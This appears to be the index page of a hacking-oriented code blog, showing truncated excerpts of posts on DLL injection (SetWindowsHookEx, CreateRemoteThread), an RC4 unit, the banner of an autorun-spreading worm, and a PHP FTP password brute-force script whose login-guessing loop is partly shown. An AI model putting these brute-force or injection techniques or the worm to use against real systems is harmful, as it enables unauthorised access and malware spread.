SetWindowsHookEx DLL injection.

On viernes, 28 de enero de 2011 1 comentarios

GetProcAddress fails with ERROR_PROC_NOT_FOUND. What am I overlooking within the DLL? Inject Code: void Injector::Inject(void){    if(CheckProcess()){       HMODULE dll  = LoadLibrary(dll_name);       FARPROC proc = GetProcAddress(dll, "GetMsgProc");       HHOOK   hh    = SetWindowsHookEx(WH_GETMESSAGE,...
Read more ...»

Simple FTP Brute-Force

On 0 comentarios

Source Code $sito = $argv[1]; $username = $argv[2]; $lista = $argv[3];   if((isset($sito)) AND (isset($lista)) AND (isset($username))){   if (file_exists($lista)){   $lista = file($lista); $connessione = ftp_connect($sito) or die("Impossibile stabilire una connessione a $sito");   foreach($lista as $passwd){   if(@ftp_login($connessione, $username, $passwd)){ die("\t[Successo]...
Read more ...»

Worm Virus | Win32.Autoexec.worm

On 0 comentarios

Description // Info '#|##########################################################|# '#| ##############-:[ Purgatory Virus Team ]:-############## |## '#| Win32.Autoexec.worm |## '#| This Worm Is A Sample Of Autorun.inf Infection Method |## '#| Infected All Drive & Floppy |## '#| © By Mr.T3RXO / [P.V.T] |## '#| [- leonhacker_14@hotmail.com , ------------------------] |## '#|__________________________________________________________|##...
Read more ...»

Text Encryption Unit

On 0 comentarios

Source Code unit unRC4; interface type   PByteArray = ^TByteArray;   TByteArray = Array [0..32767] Of Byte;   TRC4 = class   private     D               : array[Byte] of Byte;     I,J             : Byte;     procedure Init(const Key: string);     procedure Done;  ...
Read more ...»

Dll Injection Using CreateRemoteThread()

On 0 comentarios

Description // Info The CreateRemoteThread method I\'ve used this in tons of stuff, and I only recently realized that a lot of people have never seen it, or know how to do it. I can\'t take credit for thinking it up...I got it from an article on codeproject, but it\'s a neat trick that I think more people should know how to use. The trick is simple, and elegant. The windows API provides us...
Read more ...»

AUTHOR BEST THEME | CSS BY NEWWPTHEMES